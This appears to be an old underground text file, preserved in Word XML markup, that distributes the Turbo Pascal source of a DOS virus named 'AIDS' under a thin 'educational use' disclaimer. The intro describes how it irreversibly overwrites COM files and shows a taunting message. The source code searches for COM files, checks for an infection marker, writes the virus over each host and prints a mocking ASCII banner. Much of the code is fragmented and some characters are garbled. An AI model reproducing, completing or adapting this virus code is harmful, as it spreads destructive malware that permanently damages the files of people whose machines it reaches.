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   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P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@@@@@@@  @@@@@@@@  @@@@@@@@  |  *  |   #####    #####    ####     ####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@@       @@    @@     @@     |  R  |   #   #      #      #   #    #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@@       @@    @@     @@     |  *  |   #####      #      #   #    ####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@@       @@@@@@@@     @@     |  E  |   #   #      #      #   #        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@@       @@           @@     |  *  |   #   #    #####    ####     ####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@@       @@           @@     |  S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@@@@@@@  @@        @@@@@@@@  |  *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E  |     A NEW AND IMPROVED VIRUS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  *  |          PC/MS DOS MACHIN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C O R R U P T E D       |  N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*  |     CREATED BY: DOCTOR DISS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P R O G R A M M I N G     |  T  |FILE INTENDED FOR EDUCATIONAL USE ONL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*  |  AUTHOR NOT RESPONSIBLE FOR REA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 N T E R N A T I O N A L   |  S  |DOES NOT ENDORSE ANY ILLEGAL ACTIVIT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   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well, here it is... I call it AIDS... It infects all COM fil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erfect, so it will also change the date/time stamp to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, any READ-ONLY attributes will ward this virus off, it doesn't lik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this virus was originally named NUMBER ONE, and I modified th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ould fit my needs. The source code, which is included with this n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was written in Turbo Pascal 3.01a. Yeah I know it's old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added a few things, you can experiment or mess around with it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o, and add any mods to it that you want, but change the name and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redit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s approximately 13k long, and this extra memory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t picks as host. If no more COM files are to be found, it pick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1-10, and if it happens to be the lucky number 7, AIDS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screen with lots of smiles, with a note telling the operator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w screwed, I mean permanantly. The files encrypted contain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code are IRREVERSIBLY messed up.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neither CPI nor the author of Number One or AIDS endorses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gram for use in any illegal manner. Also, CPI, the author to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IDS is not responsible for any actions by the readers that may prove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 or another. This package was written for EDUCATIONAL purpos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Beginning of source code, Turbo Pascal 3.01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U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-}       { Wont allow a user break, enable IO che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 Constants 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Size = 13847;    { AIDS's code siz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 :String[42]    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'This File Has Been Infected By AIDS! HaHa!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 Type declarations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Rec    =Record      { Data area for file sear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next  :Array[1..2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Hsiz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Name: Array[1..1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  = Record    {Register set used for file sear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(AX,BX,CX,DX,BP,SI,DI,DS,ES,Flag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(AL,AH,BL,BH,CL,CH,DL,DH         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 Variables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Memory offset program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tart : Byte absolute Cseg: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 Infected mark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fected : String[42] absolute Cseg:$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         : Registers;                 { Register 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A          : DTARec;                       { Data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     : Array[Byte] of Byte;        { Data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D       : String[42]; { To recognize infected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Path      : String[66];        { Path to search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enght of search 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PathLenght: Byte absolute Use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          : File;                    { File to inf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    : Byte;                              {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Var      : Integer;  {Will loop fore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 Program code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(0, UsePath);               { get current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('\', UsePath) &lt;&gt; UsePathLen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Path := UsePath + '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Path := UsePath + '*.COM';        { Define search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AH := $1A;                            { Set data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DS := Seg(D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DX := Ofs(D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(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Path[Succ(UsePathLenght)]:=#0; { Path must end with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AH := $4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DS := Seg(Use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DX := Ofs(UsePath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CX := $ff;          { Set attribute to find ALL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(Reg);                   { Find first matching ent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Odd(Reg.Flags) Then         { If a file found th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Path := DTA.Ful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:= Pos(#0, Use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(UsePath, B, 255);             { Remove garb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Go, Use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(G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Oresult = 0 Then          { If not IO error th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Read(Go, Buffer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(Buffer[$80], TestID, 4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Test if file already ill(Infecte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stID &lt;&gt; Warning Then        { If not then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 (G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Mark file as infected and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fected :=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{ Infect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Write(Go,ProgramStart,Succ(VirusSize shr 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(G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;                   {.. and halt the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G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e file has already been infected, search nex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.AH := $4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.DS := Seg(D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.DX := Ofs(D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(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......................Until no more files are f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Odd(Reg.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var:=Random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opvar=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);                          {Give a lot of smiles}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('##');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #####################################################################');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #                            ATTENTION:                             #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     # I have been elected to inform you that throughout your process of #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     # collecting and executing files, you have accidentally #H��K�#     #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     # yourself over; again, that''s PHUCKED yourself over. No, it cannot #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     # be; YES, it CAN be, a ��s has infected your system. Now what do #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     # you have to say about that? HAHAHAHA. Have #H�� with this one and #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #                  remember, there is NO cure for                   #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #                                                                   #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #    ����������     ������������    �����������      ����������     #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱��������     �����۱�����   �۱���������    ��۱��������    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱�      �۱        �۱        �۱       �۱   �۱�       ��   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱       �۱        �۱        �۱       �۱   �۱             </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱        �۱        �۱       �۱   ������������    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱��������۱        �۱        �۱       �۱    ����������۱   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱       �۱        �۱        �۱       �۱             �۱   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱       �۱        �۱        �۱      ��۱   ��       ��۱   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #   �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۱       �۱   ������������    ����������۱�    ���������۱�   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #    ��        ��    ������������    �����������      ����������    #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #                                                                   #');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Writeln('     #####################################################################');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>LOOPVAR:=0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>UNTIL LOOPVAR=1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lthough this is a primitive virus its effective. }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{ In this virus only the .COM                       }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{ files are infected. Its about 13K and it will     }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>{ change the date entry.                            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